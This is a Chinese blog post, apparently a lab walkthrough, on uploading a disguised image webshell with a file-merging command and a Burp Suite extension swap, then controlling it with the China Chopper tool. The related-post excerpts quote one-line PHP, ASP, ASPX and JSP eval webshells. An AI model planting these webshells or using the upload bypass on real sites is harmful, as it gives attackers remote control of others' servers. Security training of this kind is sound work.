中国菜刀使用(实战正确姿势)

最新推荐文章于 2022-07-31 21:42:43 发布
最新推荐文章于 2022-07-31 21:42:43 发布
阅读量9.8k 收藏 49
点赞数 18
分类专栏: 封神
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49071539/article/details/111350049
版权

图片上传漏洞:

ps:此教程为靶场实战,切勿用于非法用途

1.准备制作图片马,随便找到一张图片重命名为1.jpg
在这里插入图片描述
2.准备好一句话木马,这里我命名为1.php
在这里插入图片描述
3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg 文件夹中会自动生成一个2.jpg文件。在这里插入图片描述
在这里插入图片描述
4. 选择上传2.jpg

在这里插入图片描述
5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为.php,转发。
在这里插入图片描述
6. 可以看到上传成功了已经
在这里插入图片描述

7. 使用菜刀连接。在这里插入图片描述
8. 找到key提交。完成
在这里插入图片描述
***END:感谢观看有什么问题可以下方提问 !***在这里插入图片描述

徐林2333
关注
  • 18
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
中国菜刀的简单使用
abtgu的博客
04-08 3725
简介 说到菜刀,普通人肯定想到家里切菜的菜刀,而对于程序员来说,首先想到的却是一款功能强大的webshell管理工具。中国菜刀小巧实用,具有文件管理,数据库管理,虚拟终端等功能,支持PHP,ASP的服务端脚本。 简单使用 新建一个PHP文件,写入一句话<?php eval($_POST['a']);?>将这个文件上传到站点里。 打开菜刀,在空白处右键点击“添加”,按照图中指示进行填写...
菜刀php教程,中国菜刀(chopper)功能介绍及使用教程
weixin_34774527的博客
03-09 5615
中国菜刀(下载地址:)是一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。注:单独的菜刀没有效果,需要服务器端有一句话后门,或漏洞,例如这样的:89/mingfang...
中国菜刀使用介绍
m0_37786014的博客
12-04 1715
一、简介 服务器只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。 目前支持的服务端脚本:PHP、ASP、.NET,并且支持、https安全连接的网站 在服务器端运行的代码如下: PHP:<?php @eval($_POST['pass'];?)> ASP:<%eval request("pass")%> ASP.NET:...
中国菜刀使用与原理分析
热门推荐
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀使用 原理分析
中国菜刀使用方法
11-26 7174
中国菜刀使用方法 [attach]268[/attach] Asp环境: Php环境: Aspx环境: 是不是很震憾,很不可思议,是的,我刚接触的时候,也是这样的想法,就这三句话,一个名不见经传的“中国菜刀”,就可以代替我那搜集了几年,大大小小几百个多种平台多种环境的脚本后门?,事实证明,我错了,原来“中国菜刀”不仅仅可以代替那些后门,而且他的功能超出我的想象,就让我慢慢
中国菜刀使用教程
qq1140037586的博客
06-28 1423
中国菜刀使用教程
上传漏洞实战——中国菜刀和kali
测试喵~
07-22 1390
1.实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2我们还需要 中国菜刀 和 kali 这两个工具,把所有的杀毒软件关了,不然中国菜刀可能会被杀毒软件和谐。实验原理 1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webs
Xise19.9无视世界WAF.zip_菜刀
09-15
更新日志  生成内页修复生成内页内核,加速生成效率。  生成内页支持新闻采集模式,可选本地新闻或远程新闻。  生成内页支持防删功能。  生成内页支持批量操作,可数千shell不间断生成。...
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
行业文档-设计装置-一种节能菜刀.zip
08-29
节能菜刀的核心概念是降低使用过程中的能量消耗,这可能体现在材料选择、刀具结构设计以及使用效率等多个方面。设计者可能会选用轻质但强度高的材料,减少挥动时的体力消耗;或者通过优化刀片形状和刃口处理,提高...
caidao:golang版本菜鸟级菜刀
05-16
菜鸟级golang菜刀 ...或者直接使用? 到当前目中cmd 执行 caidao.exe (windows) 上传见不得人的小文件 .. 这里就不讨论怎么能通过x洞上传小文件 上传文件 目前我就写了php的版本 cus.php (主要文件) fi
中国菜刀下载及基础使用教程
01-26 1万+
2011,2014,2016版下载及基础操作
强劲的Web管理系统软件,中国菜刀(chopper)的使用说明和实例教程
xhlylxhl的博客
08-29 2265
在服务器端运作的编码给出: PHP: ASP: <%eval request(“pass”)%> ASP.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%> JSP:<%if(request.getParameter(“f”)!=null)(ne...
mysql中国菜刀连接_中国菜刀使用方法以及小技巧
weixin_34938347的博客
02-08 1831
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。服务端:在服务端运行的代...
中国菜刀与一句话
weixin_30702887的博客
09-04 110
二.实战 (可用)asp的一句话是: <%eval request ("pass")%> (可用)aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> (没试)php的一句话是: <?php @eval($_POST['pass'...
菜刀如何连接mysql_中国菜刀之终端操作及数据库管理
weixin_29798625的博客
02-10 2881
实验环境操作机:Windows XP目标地址:172.16.12.2实验目的认识中国菜刀工具熟练使用中国菜刀工具进行网站文件管理、数据库管理、使用虚拟终端等操作。实验内容内容预览尝试执行命令自定义终端路径配置数据库相关参数读取数据库信息和执行sql语句虚拟终端操作中国菜刀的虚拟终端功能其实是通过相应的脚本函数执行系统命令并取得返回信息。小i提示:在本次实验中,请注意实验工具、实验文件存放路径,不同...
WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用
悦分享
07-31 3318
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
buuctf菜刀666
最新发布
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要找到解压密码,可以在数据流中寻找或者进行爆破。请注意,解压密码可能以password的方式出现在数据流中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值